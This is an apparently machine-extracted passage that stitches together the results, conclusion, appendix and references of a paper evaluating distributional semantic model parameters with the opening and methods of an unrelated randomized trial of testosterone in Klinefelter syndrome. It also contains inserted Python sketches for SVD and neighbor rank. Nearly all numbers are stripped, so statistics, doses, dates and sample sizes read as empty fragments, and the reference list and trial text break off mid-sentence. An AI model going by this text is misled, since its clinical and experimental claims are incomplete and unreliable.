− . * mitch. . . . . . . − . *** table : summary of performance while the improvements are only minimal in some cases, dimensionality reduction never has a detrimental effect while offering practical advan- tages in memory usage and computation speed. therefore, in our analysis, we focus on the runs in- volving dimensionality reduction. in the following subsections, we present detailed results for each of the three tasks. in each case, we first discuss the im- pact of dsm parameters on performance, and then describe the optimal parameter values. . toefl in the toefl task, the linear model achieves an ad- justed r of %, showing that it explains the influ- ence of model parameters on toefl accuracy very well. figure displays the ranking of the evaluated parameters according to their importance in a fea- ture ablation setting. the r values in the plots re- fer to the proportion of variance explained by the re- spective parameter together with all its interactions, * = p < . ; *** = p < . 
; n.s. = not significant. difference of means and wilcoxon p-value on spear- man’s rho for ratings datasets: rg , − . ***; ws , − . ***. corresponding to the reduction in adjusted r if this parameter is left out. we do not rely on significance values for model selection because, given the large number of measurements, virtually all parameters have a highly significant effect. criterion rel.index win.direction win.size context.dim corpus red.dim dim.skip transformation score metric partial r toefl figure : toefl, parameters and feature ablation table reports all parameter interactions for the toefl task that explain more than . % of the total variance (i.e. r ≥ . %), as well as the correspond- ing degrees of freedom (df) and r . interaction df r score:transf . metric:dim.skip . score:metric . metric:context.dim . win.size:transf . corpus:score . score:context.dim . metric:red.dim . table : toefl task: interactions, r on the basis of their influence in determining model performance, we can identify three parame- ters that are crucial for the toefl task, and which will also turn out to be very influential in the other tasks at issue: distance metric, feature score and fea- ture transformation. the best distance metric is cosine distance: this is one of the consistent findings of our evalua- tion study and it is in accordance with bullinaria and levy ( ) and, to a lesser extent, kiela and clark ( ). score and transformation al- ways have a fundamental impact on model perfor- in kiela and clark ( ), cosine is reported to be the best similarity metric, together with the correlation similarity metric ● ● ● ● ● ● ● frequency tf.idf mi dice simple−ll t−score z−score transformation ● none log root sigmoid figure : toefl, score / transformation ● ● ● ● ● transformation ● none log root sigmoid figure : toefl, window size / transformation ● ● ● ● metric ● cosine manhattan figure : toefl, metric / n. of latent dim. ● ● ● metric ● cosine manhattan figure : toefl, metric / n. of skipped dim. mance: these parameters affect the distributional space independently of tasks and datasets. we will show that they are systematically involved in a strong interaction and that it is possible to iden- tify a score/transformation combination with robust performance across all tasks. the interaction be- tween score and transformation is displayed in fig- ure . the best results are achieved by association measures based on significance tests (simple-ll, t- score, z-score), followed by mi. this result is in line with previous studies (bullinaria and levy, ; kiela and clark, ), which found pointwise mi or positive mi to be the best feature scores. the best choice, simple-log likelihood, exhibits a strong vari- ation in performance across different transforma- tions. for all three significance measures, the best feature transformation is consistently a logarithmic transformation. raw co-occurrence frequency, tf.idf and dice only perform well in combination with a square root transformation. the best window size, as shown in figure , is a -word window for all evaluated transformations. (a mean-adjusted version of cosine similarity). the latter, how- ever, turned out to be more robust across different corpora and weighting schemes. the svd parameters (number of latent dimen- sions and number of skipped dimensions) play a significant role in determining model performance. they are particularly important for the toefl task, but we will see that their explanatory power is also quite strong in the other tasks. 
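As a concrete illustration of the two dimensionality-reduction parameters discussed here, the sketch below keeps a given number of latent SVD components after skipping an initial block. The study uses randomized SVD (Halko et al.) on much larger matrices; plain numpy SVD, the placeholder data, and the choice to scale the projected vectors by their singular values are assumptions made only to keep the sketch self-contained.

import numpy as np

def reduce_dimensions(matrix, n_latent, n_skip):
    """Project row vectors onto SVD components n_skip .. n_skip + n_latent - 1.

    Skipping the first n_skip components discards the dimensions with the
    largest singular values, mirroring the dim.skip parameter. Whether skipped
    components count against the number kept is left open in the text; this
    sketch keeps n_latent components starting after the skipped ones.
    """
    u, s, _ = np.linalg.svd(matrix, full_matrices=False)
    keep = slice(n_skip, n_skip + n_latent)
    return u[:, keep] * s[keep]   # scaling by singular values is one common choice

# Placeholder data: 50 "target words" x 200 "context dimensions".
rng = np.random.default_rng(0)
matrix = rng.poisson(0.3, size=(50, 200)).astype(float)

reduced = reduce_dimensions(matrix, n_latent=20, n_skip=5)
print(reduced.shape)   # (50, 20)

Cosine distances (or neighbor ranks) between the reduced row vectors are then used exactly as in the unreduced setting.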
interestingly, they show a tendency to participate in interactions with other parameters, but do not interact among them- selves. we display the interaction between metric and number of latent dimensions in figure : the steep performance increase for both metrics shows that the widely-used choice of latent dimen- sions (landauer and dumais, ) is suboptimal for the toefl task. the best value in our exper- iment is latent dimensions, and additional di- mensions would probably lead to a further improve- ment. the interaction between metric and number of skipped dimensions is displayed in figure . while manhattan performs poorly no matter how many di- mensions are skipped, cosine is positively affected by skipping and (to a lesser extent) dimen- sions. the latter trend has already been discussed by bullinaria and levy ( ). inspection of the remaining interaction plots, not shown here for reasons of space, reveals that the best dsm performance in the toefl task is achieved by selecting ukwac as corpus and original di- mensions. the index of distributional relatedness has a very low explanatory power in the toefl task, with neighbor rank being the best choice (see plots and in section . ). given the minimal explanatory power of the di- rection of the context window and the criterion for context selection in all three tasks, we will not fur- ther consider these parameters in our analysis. we recommend to set them to an “unmarked” option: undirected and frequency. the best setting identified by inspecting all effects is shown in table , together with its performance and with the performance of the (over-trained) best model in this task. parameters of the latter are re- ported in appendix a. . ratings figure displays the importance of the evaluated pa- rameters in the task of predicting similarity ratings. parameters are ranked according to the average fea- ture ablation r values across both datasets (adj. r of the full linear model: rg : %; ws : %). ● ● ● ● ● ● ● ● ● ● ●criterion win.direction context.dim dim.skip win.size red.dim rel.index metric transformation corpus score partial r ● rg ws figure : ratings, parameters and feature ablation table reports all interactions that explain more than . % of the total variance in both datasets. for reasons of space, we only discuss the interactions and best parameter values on rg ; the correspond- ing plots for ws are shown only if there are sub- stantial differences. as already noted for the toefl task, score and transformation have a large explanatory power and they are involved in a strong interaction showing the interaction df rg ws score:transf . . metric:red.dim . . score:metric . . win.size:transf . . corpus:metric . . metric:context.dim . . corpus:score . . win.size:score . . score:dim.skip . . table : ratings datasets: interactions, r same tendencies and optimal values already iden- tified for toefl. for reasons of space, we do not elaborate on this interaction here. the analysis of the main effects shows that for both datasets wackypedia is the best option as a source corpus, suggesting that this task bene- fits from a trade-off between quality and quan- tity (wackypedia being smaller and cleaner than ukwac, but less balanced than the bnc). index of distributional relatedness plays a much more important role than for the toefl task, with neighbor rank clearly outperforming distance (see figures and and the discussion in section . for more details). 
the choice of the optimal window size depends on transformation: on the rg dataset, figure shows that for a logarithmic transformation – which we al- ready identified as the best transformation in combi- nation with significance association measures – the highest performance is achieved with a word win- dow. the corresponding effect display for ws (figure ) suggests that a further small improvement may be obtained with an word window in this case. one possible explanation for this observation is the different composition of the ws dataset, which includes examples of semantic relatedness beyond attributional similarity. the word window is a ro- bust choice across both datasets, though. the number of latent dimensions is involved in a strong interaction with the distance metric (figure ). best results are achieved with the cosine met- ric and at least latent dimensions, as well as skipped dimensions. the interaction plot between metric and number of original dimensions in figure shows that context dimensions are suffi- cient for good performance, and no further improve- ment can be expected from even higher-dimensional spaces. ● ● ● ● ● . . . . . . . transformation ● none log root sigmoid figure : rg , window size / transformation ● ● ● ● ● . . . . . . . transformation ● none log root sigmoid figure : ws , window size / transformation ● ● ● ● ● . . . . . . . metric ● cosine manhattan figure : rg , metric / n. latent dim. ● ● ● ● ● . . . . . . . metric ● cosine manhattan figure : rg , metric / n. context dimensions best settings for both datasets are summarized in table . refer to appendix a for best models. . clustering figure displays the importance of the evaluated parameters in the clustering task (adj. r of the full linear model: ap: %; battig: %; esslli: %; mitchell: %). parameter ranking is de- termined by the average of the feature ablation r values over all four datasets. ● ● ● ● ● ● ● ● ● ● ●criterion win.direction rel.index context.dim dim.skip red.dim win.size metric corpus transformation score partial r ● ap battig esslli mitchell figure : clustering, parameters and feat. ablation interaction df ap battig esslli mitchell score:transf . . . . metric:red.dim . . . . win.size:metric . . . . win.size:transf . . . . corpus:metric . . . . metric:dim.skip . . . . corpus:win.size . . . . score:dim.skip . . . . win.size:score . . . . table : clustering task: interactions, r table reports all parameter interactions that ex- plain more than . % of the total variance for each of the four datasets. in the following discussion, we focus on the ap dataset, which is larger and thus more reliable than the other three datasets. we mention remarkable dif- ferences between the datasets in terms of best pa- rameter values. for a full overview of the best pa- rameter setting for each dataset, see table . as already discussed for toefl and the ratings task, we find score and transformation at the top of the feature ablation ranking. table confirms that the two parameters are involved in a strong inter- action. the interaction plot (figure ) shows the behavior we are already familiar with: significance ● ● ● ● ● ● ● . . . . frequency tf.idf mi dice simple−ll t−score z−score transformation ● none log root sigmoid figure : ap, score / transformation ● ● ● ● ● . . . . metric ● cosine manhattan figure : ap, window size / metric ● ● ● ● ● . . . . corpus ● bnc wacky ukwac figure : ap, corpus / window size ● ● ● . . . . metric ● cosine manhattan figure : ap, metric / n. of skipped dim. 
measures (simple-ll, t-score and z-score) reach the best performance in combination with log transfor- mation: this combination is a robust choice also for the other datasets, with minor differences that can be observed in table . the interaction between window size and metric is displayed in figure : best performance is achieved with a or word window in combination with co- sine distance. results on the other datasets suggest a preference for the word window. this is confirmed by interaction plots with source corpus (figure ), which also reveal that wackypedia is again the best compromise between size and quality. a very clear picture concerning the number of skipped dimensions emerges from figure and is the same for all datasets: skipping dimensions is not necessary to achieve good performance (even though skipping dimensions turned out at least to be not detrimental for battig and mitchell). further effect displays, not shown here for rea- sons of space, suggest that or latent dimen- sions – with some variation across the datasets (cf. table ) – and a medium-sized co-occurrence matrix ( or dimensions) are needed to achieve good performance. neighbor rank is the best choice as index of distributional relatedness (see section . ). see appendix a for best models. . relatedness index a novel contribution of our work is the systematic evaluation of a parameter that has received little at- tention in dsm research so far, and only in studies limited to a narrow choice of datasets (lapesa and evert, ; lapesa et al., ; zeller et al., ): the index of distributional relatedness. the aim of this section is to provide a full overview of the impact of this parameter in our ex- periments. despite the main focus of the paper on the reduced setting, in this section we also show re- sults from the unreduced setting, for two reasons: first, since this parameter is relatively novel and evaluated here for the first time on standard tasks, we consider it necessary to provide a full picture concerning its behavior; second, relatedness index turned out to be much more influential in the unre- duced setting than in the reduced one. figure and display the partial effect of relat- edness index for each dataset, in the unreduced and reduced setting respectively. to allow for a com- parison between the different measures of perfor- ● ●● ● ● ● ● toefl rg ws ap battig mitchell esslli rel.index ● dist rank figure : unreduced setting ● ● ● ● ● ● ● toefl rg ws ap battig mitchell esslli rel.index ● dist rank figure : reduced setting mance, correlation and purity values have been con- verted to percentages. the picture emerging from the two plots is very clear: neighbor rank is the best choice for both settings across all seven datasets. the degree of improvement over vector distance, however, shows considerable variation between dif- ferent datasets. the rating task benefits the most from the use of neighbor rank. on the other hand, neighbor rank has very lit- tle effect for the toefl task in a reduced setting, where its high computational complexity is clearly not justified; the improvement on the ap clustering dataset is also fairly small. while the toefl result seems to contradict the substantial improvement of neighbor rank found by lapesa and evert ( ) for a multiple-choice task based on stimuli from prim- ing experiments, there were only two choices (con- sistent and inconsistent prime) in this case rather than four. 
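To make the rank-based relatedness index concrete, the sketch below computes a neighbor rank and the symmetric index (the average of the log ranks in both directions) from a precomputed distance matrix. The tie handling, the natural logarithm, and the toy data are assumptions of this sketch; for the TOEFL task the analogous quantity is the rank of the target among the neighbors of each answer candidate, with the best-ranked candidate chosen.

import numpy as np

def neighbor_rank(dist, a, b):
    """Rank of word b among the nearest neighbors of word a (1 = closest),
    given a square matrix of pairwise distances."""
    order = np.argsort(dist[a])
    order = order[order != a]   # a word is not counted among its own neighbors
    return int(np.where(order == b)[0][0]) + 1

def symmetric_log_rank(dist, a, b):
    """Symmetric relatedness index: average of log rank(a, b) and log rank(b, a).
    Lower values indicate that the two words are close neighbors of each other."""
    return 0.5 * (np.log(neighbor_rank(dist, a, b)) +
                  np.log(neighbor_rank(dist, b, a)))

# Placeholder distance matrix over five words (symmetric, zero diagonal).
rng = np.random.default_rng(1)
points = rng.normal(size=(5, 3))
dist = np.linalg.norm(points[:, None, :] - points[None, :, :], axis=-1)

print(neighbor_rank(dist, 0, 3), symmetric_log_rank(dist, 0, 3))

Because ranks are asymmetric, rank(a, b) and rank(b, a) generally differ, which is what the directional variants mentioned in the text would exploit.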
we do not rule out that a more refined use of the rank information (for example, different strategies for rank combinations) may produce bet- ter results on the toefl and ap datasets. as discussed in section . , we have not yet ex- plored the potential of neighbor rank in modeling directionality effects in semantic similarity. unlike lapesa and evert ( ), who adopt four differ- ent indexes of distributional relatedness (vector dis- tance; forward rank, i.e., rank of the target in the neighbors of the prime; backward rank, i.e, rank of the prime in the neighbors of the target; average of backward and forward rank), we used only a single rank-based index (cf. section . ), mostly for rea- sons of computational complexity. we consider the results of this study more than encouraging, and ex- pect further improvements from a full exploration of directionality effects in the tasks at issue. . best settings we conclude the result overview by evaluating the best parameter combinations identified for each task and data set, showing how well our approach to model selection works in practice. table summarizes the optimal parameter set- tings identified for each task and compares the per- formance of this model (b.set = best setting) with the over-trained best run in the experiment (b.run = best run). in most cases, the result of our ro- bust parameter optimization is close to the best run. the only exception is the esslli dataset, which is smaller than the other datasets and particularly sus- ceptible to over-training (cf. the low r of the re- gression analysis in section . ). table also re- ports the current state of the art for each task (soa = state-of-the-art), taken from the acl wiki where available (toefl and similarity ratings), from ba- roni and lenci ( ) for the clustering tasks, and from more recent studies of which we are aware. our results are comparable to the state of the art, even though the latter includes a much broader range of approaches than our window-based dsms. in one case (battig), our optimized model even improves on the best previous result. a side-by-side inspection of the main effects and interaction plots for different data sets allowed us to identify parameter settings that are robust across datasets and even across tasks. table shows rec- ommended settings for each task (independent of the abbreviations in the table: win = window size; c.dim = number of context dimensions; tr = transformation; red.dim = number of latent dimensions; d.sk= number of skipped dimen- sions; r.ind = relatedness index; parameter values: s-ll = simple- ll; t-sc = t-score; cos = cosine; man = manhattan. http://aclweb.org/aclwiki dataset corpus win c.dim score tr metric r.ind red.dim d.sk b.set b.run soa reference toefl ukwac k s-ll log cos rank . . . bullinaria and levy ( ) rg wacky k s-ll log cos rank . . . hassan and mihalcea ( ) ws wacky k s-ll log cos rank . . . halawi et al. ( ) ap wacky k s-ll log cos rank . . . rotenhäusler and schütze ( ) battig wacky k s-ll log cos rank . . . baroni and lenci ( ) esslli wacky k t-sc log cos rank . . . katrenko, esslli workshop mitchell wacky k s-ll log cos rank . . . bullinaria and levy ( ) common for all datasets: window direction = undirected; criterion for context selection = frequency table : best settings particular dataset) and a more general setting that achieves good performance in all three tasks. eval- uation results for these settings on each dataset are reported in table . 
in most cases, the general model is close to the performance of the task- and dataset- specific settings. our robust evaluation methodol- ogy has enabled us to find a good trade-off between portability and performance. task corpus win c.dim score tr metric r.ind red.dim d.sk toefl ukwac k s-ll log cos rank rating wacky k s-ll log cos rank clustering wacky k s-ll log cos rank general wacky k s-ll log cos rank table : general best settings dataset toefl ratings clustering general toefl . . . . rg . . . . ws . . . . ap . . . . battig . . . . esslli . . . . mitchell . . . . table : general best settings – performance conclusion in this paper, we reported the results of a large-scale evaluation of window-based distributional semantic models, involving a wide range of parameters and tasks. our model selection methodology is robust to overfitting and sensitive to parameter interactions. the acl wiki lists the hybrid model of yih and qazvinian ( ) as the best model on rg with ρ = . , but does not specify its pearson correlation r. in our comparison table, we show the best pearson correlation, achieved by hassan and mi- halcea ( ), which is also the best corpus-based model. halawi et al. ( ) report spearman’s ρ . the ρ values for our best setting are: rg : . , ws : . ; best setting for the ratings task: rg : . , ws : . ; best general setting: rg : . , ws : . . http://wordspace.collocations.de/ it allowed us to identify parameter configurations that perform well across different datasets within the same task, and even across different tasks. we rec- ommend the setting highlighted in bold font in table as a general-purpose dsm for future research. we believe that many applications of dsms (e.g. vector compositon) will benefit from using such a param- eter combination that achieves robust performance in a variety of semantic tasks. moreover, an exten- sive evaluation based on a robust methodology like the one presented here is the first necessary step for further comparisons of bag-of-words dsms to dif- ferent techniques for modeling word meaning, such as neural embeddings (mikolov et al., ). let us now summarize our main findings. • our experiments show that a cluster of three pa- rameters, namely score, transformation and dis- tance metric, plays a consistently crucial role in determining dsm performance. these param- eters also show a homogeneous behavior across tasks and datasets with respect to best parameter values: simple-ll, log transformation and cosine distance. these tendencies confirm the results in polajnar and clark ( ) and kiela and clark ( ). in particular, the finding that sparse as- sociation measures (with negative values clamped to zero) achieve the best performance can be con- nected to the positive impact of context selection highlighted by polajnar and clark ( ): ongo- ing work targets a more specific analysis of their “thinning” effect on distributional vectors. • another group of parameters (corpus, window size, dimensionality reduction parameters) is also influential in all tasks, but shows more variation wrt. the best parameter values. except for the toefl task, best results are obtained with the wackypedia corpus, confirming the observation of sridharan and murphy ( ) that corpus qual- ity compensates for size to some extent. window size and dimensionality reduction show a more task-specific behavior, even though it is possible to find a good compromise in a word window, a reduced space of dimensions and skipping of the first dimensions. 
the latter result confirms the findings of bullinaria and levy ( ; ) in their clustering experiments. • the number of context dimensions turned out to be less crucial. while very high-dimensional spaces usually result in better performance, the increase beyond or dimensions is rarely suf- ficient to justify the increased processing cost. • a novel contribution of our work is the systematic evaluation of a parameter that has been given lit- tle attention in dsm research so far: the index of distributional relatedness. our results show that, even if the parameter is not among the most in- fluential ones, neighbor rank consistently outper- forms distance. without svd dimensionality re- duction, the difference is more pronounced: this result is particularly interesting for composition- ality tasks, where svd has been reported to be detrimental (baroni and zamparelli, ). in such cases, the benefits of using neighbor rank clearly outweigh the increased (but manageable) computational complexity. ongoing work focuses on the extension of the eval- uation setting to further parameters (e.g., new dis- tance metrics and association scores, caron’s ( ) exponent p) and tasks (e.g., compositionality tasks, meaning in context), as well as the evaluation of dependency-based models. we are also working on a refined model selection methodology involv- ing a systematic analysis of three-way interactions and the exclusion of inferior parameter values (such as manhattan distance, sigmoid transformation and dice score), which may have a confounding effect on some of the effect displays. appendix a: best models this appendix reports the best runs for every dataset. some abbreviations are different from tables and . pa- rameters: w = window; dir = direction; e = exclusion criterion for context selection; m = metric. performance: acc = accu- racy; cor = correlation; pur = purity. parameter values: dir = directed; undir = undirected; f = frequency; nz = non-zero. corpus w dir e c.dim score tr m r.ind red.dim d.sk acc ukwac undir f mi none cos rank . ukwac dir f t-score log cos rank . ukwac undir f t-score root cos dist . ukwac dir f simple-ll log cos dist . table : toefl dataset – models tied for best result ( hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk cor ukwac undir nz mi none cos rank . ukwac dir f mi none cos rank . wacky dir nz simple-ll log cos rank . wacky undir f z-score log cos rank . table : ratings, rg dataset – models tied for best result ( hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk cor wacky dir f mi none man rank . wacky undir f mi none man rank . wacky undir f z-score log man rank . wacky dir f z-score root man rank . table : ratings, wordsim dataset – best model ( additional hand-picked models with sim- ilar performance are shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur ukwac dir nz t-score log man rank . wacky dir nz z-score log man rank . wacky undir f simple-ll log man rank . wacky dir f z-score log cos rank . table : clustering, almuhareb-poesio dataset – best model (plus additional hand-picked models) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur ukwac undir f dice root man rank . ukwac undir f freq log cos dist . wacky undir f z-score log man dist . wacky undir f dice root man rank . table : clustering, battig dataset – models tied for best result ( hand-picked examples shown) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur wacky dir nz z-score none man dist . 
ukwac dir nz simple-ll log cos dist . ukwac undir f tf.idf none man dist . wacky undir f tf.idf root man rank . table : clustering, esslli dataset – best model (plus additional hand-picked models) corpus w dir e c.dim score tr m r.ind red.dim d.sk pur bnc undir nz simple-ll log cos rank . bnc undir f simple-ll log cos rank . bnc undir nz simple-ll log cos rank . table : clustering, mitchell dataset – models tied for best result acknowledgments we are grateful to the editor and the anonymous re- viewers, whose comments helped us improve the paper. we would like to thank sabine schulte im walde and the semrel group at the ims stuttgart, the corpus linguistics group at the university of erlangen-nürnberg and the computational linguis- tics group at the ikw osnabrück for their feedback on our work. gabriella lapesa’s phd research was funded by the dfg collaborative research centre sfb at ims stuttgart, where she conducted a large part of the work presented in this paper. references abdulrahman almuhareb. . attributes in lexical acquisition. ph.d. thesis, university of essex. marco baroni and alessandro lenci. . distribu- tional memory: a general framework for corpus-based semantics. computational linguistics, ( ): – . marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , mit, massachusetts, usa. marco baroni, raffaella bernardi, and roberto zampar- elli. . frege in space: a program for compo- sitional distributional semantics. linguistic issues in language technology (lilt), ( ): – . john a. bullinaria and joseph p. levy. . extract- ing semantic representations from word co-occurrence statistics: a computational study. behavior research methods, : – . john a. bullinaria and joseph p. levy. . extract- ing semantic representations from word co-occurrence statistics: stop-lists, stemming and svd. behavior research methods, : – . john a. bullinaria and joseph p. levy. . limiting factors for mapping corpus-based semantic represen- tations to brain activity. plos one, ( ): – . john caron. . experiments with lsa scoring: optimal rank and basis. in michael w. berry, edi- tor, computational information retrieval, pages – . society for industrial and applied mathematics, philadelphia, pa, usa. stefan evert. . corpora and collocations. in anke lüdeling and merja kytö, editors, corpus linguistics. an international handbook, chapter . mouton de gruyter, berlin, new york. stefan evert. . distributional semantics in r with the wordspace package. in proceedings of coling , the th international conference on compu- tational linguistics: system demonstrations, pages – , dublin, ireland. lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and eytan ruppin. . placing search in context: the concept revisited. acm transactions on information systems, ( ): – . john fox. . effect displays in r for generalised lin- ear models. journal of statistical software, ( ): – . guy halawi, gideon dror, evgeniy gabrilovich, and yehuda koren. . large-scale learning of word re- latedness with constraints. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – , new york, ny, usa. nathan halko, per-gunnar martinsson, and joel a. tropp. . finding structure with randomness: stochastic algorithms for constructing approximate matrix decompositions. 
technical report - , acm, california institute of technology. mary hare, michael jones, caroline thomson, sarah kelly, and ken mcrae. . activating event knowl- edge. cognition, ( ): – . zelig harris. . distributional structure. word, ( ): – . samer hassan and rada mihalcea. . semantic relat- edness using salient semantic analysis. in proceedings of the twenty-fifth aaai conference on artificial intel- ligence, pages – , san francisco, california. george karypis. . cluto: a clustering toolkit (release . . ). technical report - , minneapo- lis: university of minnesota, department of computer science. leonard kaufman and peter j. rousseeuw. . find- ing groups in data: an introduction to cluster analysis. john wiley and sons. douwe kiela and stephen clark. . a systematic study of semantic vector space model parameters. in proceedings of eacl , workshop on continu- ous vector space models and their compositionality (cvsc), pages – , gothenburg, sweden. thomas k. landauer and susan t. dumais. . a so- lution to plato’s problem: the latent semantic analysis theory of the acquisition, induction, and representation of knowledge. psychological review, : – . gabriella lapesa and stefan evert. . evaluating neighbor rank and distance measures as predictors of semantic priming. in proceedings of the acl work- shop on cognitive modeling and computational lin- guistics (cmcl ), pages – , sofia, bulgaria. gabriella lapesa, stefan evert, and sabine schulte im walde. . contrasting syntagmatic and paradig- matic relations: insights from distributional semantic models. in proceedings of the third joint confer- ence on lexical and computational semantics (*sem ), pages – , dublin, ireland. dekang lin. . automatic retrieval and clustering of similar words. in proceedings of the th annual meeting of the association for computational linguis- tics and th international conference on computa- tional linguistics - volume , pages – , mon- treal, quebec, canada. kevin lund and curt burgess. . producing high-dimensional semantic spaces from lexical co- occurrence. behavior research methods, instrumen- tation and computers, : – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. corr. jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl- : hlt, pages – , columbus, ohio. tom mitchell, svetlana v. shinkareva, andrew carlson, kai-min chang, vicente l. malave, robert a. mason, and marcel adam just. . predicting human brain activity associated with the meanings of nouns. sci- ence, ( ): – . brian murphy, partha talukdar, and tom mitchell. . selecting corpus-semantic models for neurolinguistic decoding. in proceedings of the first joint conference on lexical and computational semantics - semeval ’ , pages – . sebastian padó and mirella lapata. . dependency- based construction of semantic space models. compu- tational linguistics, ( ): – . tamara polajnar and stephen clark. . improving distributional semantic vectors through context selec- tion and normalisation. in proceedings of the th conference of the european chapter of the asso- ciation for computational linguistics (eacl ), pages – , gothenburg, sweden. klaus rothenhäusler and hinrich schütze. . un- supervised classification with dependency based word spaces. in proceedings of the eacl workshop on gems: geometical models of natural language semantics, pages – , athens, greece. herbert rubenstein and john b. goodenough. . 
research: a placebo-controlled randomized study with testosterone in klinefelter syndrome: beneficial effects on body composition

christian høst, anders bojesen, mogens erlandsen, kristian a groth, kurt kristensen, anne grethe jurik, niels h birkebæk and claus h gravholt

department of endocrinology and internal medicine and the medical research laboratories, clinical institute, aarhus university hospital, aarhus n, denmark; department of pediatrics, aarhus university hospital, aarhus n, denmark; department of clinical genetics, aarhus university hospital, aarhus n, denmark; section for biostatistics, department of public health, aarhus university, aarhus c, denmark; department of molecular medicine, aarhus university hospital, aarhus n, denmark; department of radiology, aarhus university hospital, aarhus n, denmark

correspondence should be addressed to c h gravholt: ch.gravholt@dadlnet.dk

abstract
context and objective: males with klinefelter syndrome (ks) are typically hypogonadal with a high incidence of metabolic disease, increased body fat and mortality. testosterone treatment of hypogonadal patients decreases fat mass, increases lean body mass and improves insulin sensitivity, but whether this extends to patients with ks is presently unknown.
research design and methods: in a randomized, double-blind, placebo-controlled, bmi-matched cross-over study, males with ks (age: . years; bmi: . kg/m) received testosterone (andriol®) mg per day (testosterone) or placebo treatment for months. thirteen age- and bmi-matched healthy controls were recruited. dexa scan, abdominal computed tomography (ct) scan and a hyperinsulinemic–euglycemic clamp, muscle strength and maximal oxygen uptake measurement were performed.
results: total lean body mass and body fat mass were comparable between testosterone-naïve ks and controls using dexa, whereas visceral fat mass, total abdominal and intra-abdominal fat by ct were increased (p < . ). testosterone decreased total body fat (p = . ) and abdominal fat by ct (p = . ). glucose disposal was similar between testosterone-naïve ks and controls (p = . ) and unchanged during testosterone (p = . ). free fatty acid suppression during the clamp was impaired in ks and maximal oxygen uptake was markedly lower in ks, but both were unaffected by treatment. testosterone increased hemoglobin and igf-i.
conclusion: testosterone treatment in adult males with ks for months leads to favorable changes in body composition with reductions in fat mass, including abdominal fat mass, but does not change measures of glucose homeostasis.

keywords: klinefelter syndrome, testosterone, body composition, rare diseases/syndromes, insulin sensitivity

introduction
klinefelter syndrome (ks, ,xxy) is the most common sex chromosomal disorder with a prevalence of in men ( , ). classically, the ks phenotype is characterized by eunuch body proportions, increased height and hypergonadotropic hypogonadism ( ). the incidence of the metabolic syndrome and insulin resistance is considerably higher in patients with ks ( , ), and epidemiological studies show an increased mortality
due to diabetes as well as diseases of the cardiovascular, respiratory and digestive systems ( ). the association between ks and diabetes was first reported in , with % of patients with ks having a diabetic oral glucose tolerance test ( ). others have described decreased insulin sensitivity, with increased fasting insulin levels ( ). at the same time, cross-sectional studies have shown an inverse relationship between plasma testosterone and insulin resistance in normal males ( ). we previously found that the increased occurrence of insulin resistance and diabetic glucose tolerance testing among males with ks translates into an increased frequency of type diabetes among patients with ks, who are often hypogonadal ( ). among normal males, hypogonadism is also more prevalent among patients with type diabetes than in age-matched controls ( ), which could indicate a bi-directional relationship between testosterone and diabetes. this effect is less pronounced ( ) or even absent ( , ) when one takes into account bmi or waist-to-hip ratio. this lack of an association between testosterone and diabetes, when adding bmi or the amount of body fat into the equation, begs the question whether the association between testosterone and type diabetes is through adiposity rather than testosterone itself, not forgetting the distinct genetic background present in ks with an additional x chromosome. it has been shown that treatment with testosterone in hypogonadal patients with type diabetes improves insulin sensitivity in obese patients ( ), but not in lean patients ( ), which points toward the fact that changes in insulin sensitivity during therapy largely depend on the amount of 'modifiable fat', especially visceral fat. studies on male hypogonadal patients of different etiologies have shown an increase in muscle mass and a decreased fat mass following -month testosterone treatment ( ), and that withdrawal of testosterone supplementation for just days leads to lower insulin sensitivity ( ). however, the genetic make-up of males with ks is unique, and one study found that increased insulin resistance in ks was related to gene dosage of the csf ra gene located on both the x and y chromosome ( ). also, higher leptin levels in ks compared with controls were not lowered after months of testosterone treatment ( ), and finally, it has been suggested that overproduction of ccl , a small chemokine expressed at sites of inflammation and associated with insulin resistance, could explain insulin resistance in ks ( ). recently, we found profound changes in the methylation and rna expression pattern throughout the genome among males with ks, and enrichment analyses showed that the observed methylation changes were related to development of diabetes ( ). the present study is the first randomized placebo-controlled study to investigate the effects of testosterone treatment on insulin sensitivity, body composition, muscle strength and maximal oxygen uptake in patients with ks using gold standard methods.
we hypothesized that testosterone treatment would improve insulin sensitivity and body composition.

materials and methods
subjects
twenty males with ks were included in the study. men with ks were recruited from the outpatient clinic at the department of endocrinology and internal medicine at aarhus university hospital. inclusion criteria were age above years with verified ks karyotype. exclusion criteria were bmi above kg/m or below kg/m, diabetes, history of malignant disease, prostate-specific antigen above ng/ml, symptomatic heart disease, familial history of thromboembolic conditions, clinical hepatic disease (alanine aminotransferase more than four times above the upper limit value), known allergic condition toward the medicine used in the project, heavy smoking (more than cigarettes a day), alcoholism (more than units of alcohol per week), severe mental illness or any other condition with a known influence on the investigated parameters. most males with ks had received testosterone treatment before entering the study, while a few were testosterone naïve at inclusion. during the study, one was excluded due to a high serum testosterone. four withdrew their informed consent, and two withdrew their consent to participate due to side effects of the study medication, which were perceived by the study investigators to be normal effects of testosterone. thus the final study group consisted of patients (age: . ( – years); bmi: . ± . (kg/m)) with cytogenetically verified ks. the control group consisted of age- (age: . ( – ) years) and bmi-matched ( . ± . (kg/m)) healthy controls, who were recruited through advertisement on the internet. before study start, participants (ks and controls) were screened and a complete physical examination was performed. all volunteers received oral and written information prior to giving written, informed consent. the study was conducted from to . the protocol was approved by the region midt ethical scientific committee (# ) and performed in accordance with the helsinki declaration ii.

study design
